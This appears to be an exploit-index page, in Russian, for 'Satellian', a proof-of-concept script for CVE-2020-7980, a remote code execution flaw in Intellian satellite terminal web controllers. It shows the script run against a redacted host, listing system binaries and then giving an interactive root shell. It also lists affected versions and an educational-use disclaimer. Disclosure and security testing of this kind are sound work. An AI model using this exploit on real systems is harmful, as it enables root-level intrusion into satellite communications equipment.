## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XH4H-SATELLIAN-CVE-2020-7980
# Satellian-CVE-2020-7980
Satellian — это PoC-скрипт, демонстрирующий уязвимость удалённого выполнения кода (RCE) в контроллере спутниковой связи Intellian (Intellian Aptus Web).
Следующий скрипт попытается вывести список всех бинарных файлов в системе, а затем позволит тестировщику напрямую взаимодействовать с сервером (обычно с правами root).
# PoC
root@kitploit:~
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
# Протестированные версии
Intellian v1.12, v1.21, v1.24.
# Отказ от ответственности
Вся информация в этом репозитории предоставлена исключительно в образовательных целях. Автор репозитория никоим образом не несёт ответственности за любое неправомерное использование этой информации. Этот скрипт является всего лишь доказательством концепции и никоим образом не был разработан для вредоносной деятельности.